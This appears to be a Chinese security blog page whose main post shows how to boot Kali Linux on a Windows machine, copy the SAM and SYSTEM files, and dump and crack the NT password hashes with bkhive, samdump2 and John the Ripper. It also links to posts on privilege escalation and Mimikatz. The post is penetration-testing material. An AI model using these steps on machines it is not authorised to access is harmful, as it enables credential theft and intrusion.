j4s0nh4ck
- 浏览: 278060 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
由于Windows的SAM密码保护机制,SAM文件在Windows启动后就被保护,所以不能开机后破解。
查看磁盘分区。在我电脑测试时为一个/dev/sda5,文件格式为HPFS/NTFS/exFAT
找到存放SAM和SYSTEM文件的文件夹
来查看系统boot key,此时工作目录下多出一个bootkey的文件
使用samdump2命令dump出hash值
来破解密码
引用
1. 使用usb启动kali
引用
2. fdisk -l
查看磁盘分区。在我电脑测试时为一个/dev/sda5,文件格式为HPFS/NTFS/exFAT
引用
3. mount -t ntfs /dev/sda5 /mnt
引用
4. cd /mnt
引用
5. find . -name "*SAM*"
找到存放SAM和SYSTEM文件的文件夹
引用
6. 将SAM和SYSTEM拷贝到工作目录下
引用
7. bkhive SYSTEM bootkey
来查看系统boot key,此时工作目录下多出一个bootkey的文件
引用
8. samdump2 SAM bootkey > hash.txt
使用samdump2命令dump出hash值
引用
9. john ./hash.txt --show --format=nt
来破解密码
分享到:
发表评论
-
[图] windows 10
2015-08-18 20:37 283网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 539https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 508原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1466原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 445引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 752原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 382原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 473原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2820原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 299原文地址:http://blog.gdssecurity.co ... -
window增加硬盘性能方法
2015-02-05 01:03 337参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 769原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 844https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 914原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1515下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1003原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3735原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ... -
Windows工具集
2014-12-25 00:54 494参考:https://community.rapid7.com ... -
Kerberos攻击
2014-12-18 01:39 591参考: 1. http://securityweekly.co ...
相关推荐
采用开源的RTMPDUMP开发的一个发布端实例,RTMPDUMP本身有下载实例,这个是发布端的。需要的朋友可以参考一下
pg_dump: pg_dump -a -t tbl_test "host=127.0.0.1 hostaddr=127.0.0.1 port=5432 user=postgres password=123456 dbname=postgres" > /userdir/tbl_data a 参数是表示只导出数据,其他的额外信息不需要,该参数也...
windows生成dump文件,分析dump文件排查windows客户端异常
执行改注册表后,程序崩溃后会自动生成dump
在window程序中,添加代码一边在程序崩溃时候产生coredump,能准确定位崩溃地点。
当windows程序崩溃,通过此此代码可以产生完整的dump文件,并可控制产生文件数量
从当前linux用户dump登录密码的工具
windows 环境下利用ramdump-parse工具解析android dump文件工具,以sdm660为例的解析命令。
Windows设置FullDump以及键盘触发蓝屏
为处理windows程序崩溃问题,有必要引入异常捕获模块。本资源主要讲述如何配置产生dump文件的环境以及dump文件产生后的分析定位。
windows_crash_dump_analysis.ppt
class-dump-z全平台版本(linux、iPhone、Windows)
windows注册表配置生成DUMP
windows C++ 产生dump文件的demo,定位代码内存错误非常有效
DumpTool主要用来在用户机器上对目标进程生成dump文件,定位“卡死”、Crash等问题。 (1)MiniDump: 表示生成一个包含必要信息的dump文件,文件大小约200-500k,具体Flag =MiniDumpNormal|...
使用密码和截止日期来保护你所分享的连结。任何装置都可用。 Apps 提供给Windows, Mac, Android 和iOS 免费包括在所有帐户中。下载 Dump Truck 线上储存取得 免费的 5 GB 帐户。藉由推荐朋友方式取得更多储存空间。
C++ windows工程中 简单生成 dump文件,以便问题定位
c++ 生成dump文件小程序。dump文件为调试程序的一种文件。
描述windows下如何获取到websphere的dump信息。
windows 应用程序崩溃时的内存转储及dump文件的分析